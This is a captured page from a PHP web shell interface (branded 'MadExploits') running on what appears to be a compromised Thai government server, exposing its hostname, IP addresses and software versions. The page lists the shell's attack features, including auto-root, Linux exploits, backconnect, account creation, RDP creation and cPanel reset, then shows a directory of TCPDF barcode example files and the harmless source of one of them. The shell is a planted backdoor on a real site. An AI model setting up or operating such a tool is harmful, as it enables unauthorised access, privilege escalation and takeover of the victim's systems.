Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
php-tcpdf-6.2.26 /
examples /
barcodes /
[ HOME SHELL ]
Name
Size
Permission
Action
example_1d_html.php
1.97
KB
-rw-r--r--
example_1d_png.php
1.96
KB
-rw-r--r--
example_1d_svg.php
1.96
KB
-rw-r--r--
example_1d_svgi.php
1.97
KB
-rw-r--r--
example_2d_datamatrix_html.php
1.97
KB
-rw-r--r--
example_2d_datamatrix_png.php
1.97
KB
-rw-r--r--
example_2d_datamatrix_svg.php
1.96
KB
-rw-r--r--
example_2d_datamatrix_svgi.php
1.98
KB
-rw-r--r--
example_2d_pdf417_html.php
1.97
KB
-rw-r--r--
example_2d_pdf417_png.php
1.96
KB
-rw-r--r--
example_2d_pdf417_svg.php
1.96
KB
-rw-r--r--
example_2d_pdf417_svgi.php
1.98
KB
-rw-r--r--
example_2d_qrcode_html.php
1.97
KB
-rw-r--r--
example_2d_qrcode_png.php
1.97
KB
-rw-r--r--
example_2d_qrcode_svg.php
1.96
KB
-rw-r--r--
example_2d_qrcode_svgi.php
1.98
KB
-rw-r--r--
tcpdf_barcodes_1d_include.php
1.41
KB
-rw-r--r--
tcpdf_barcodes_2d_include.php
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : example_2d_datamatrix_png.php
<?php //============================================================+ // File name : example_2d_png.php // Version : 1.0.000 // Begin : 2011-07-21 // Last Update : 2013-03-19 // Author : Nicola Asuni - Tecnick.com LTD - www.tecnick.com - info@tecnick.com // License : GNU-LGPL v3 (http://www.gnu.org/copyleft/lesser.html) // ------------------------------------------------------------------- // Copyright (C) 2009-2013 Nicola Asuni - Tecnick.com LTD // // This file is part of TCPDF software library. // // TCPDF is free software: you can redistribute it and/or modify it // under the terms of the GNU Lesser General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // TCPDF is distributed in the hope that it will be useful, but // WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. // See the GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License // along with TCPDF. If not, see <http://www.gnu.org/licenses/>. // // See LICENSE.TXT file for more information. // ------------------------------------------------------------------- // // Description : Example for tcpdf_barcodes_2d.php class // //============================================================+ /** * @file * Example for tcpdf_barcodes_2d.php class * @package com.tecnick.tcpdf * @author Nicola Asuni * @version 1.0.009 */ // include 2D barcode class (search for installation path) require_once(dirname(__FILE__).'/tcpdf_barcodes_2d_include.php'); // set the barcode content and type $barcodeobj = new TCPDF2DBarcode('http://www.tcpdf.org', 'DATAMATRIX'); // output the barcode as PNG image $barcodeobj->getBarcodePNG(6, 6, array(0,0,0)); //============================================================+ // END OF FILE //============================================================+
Close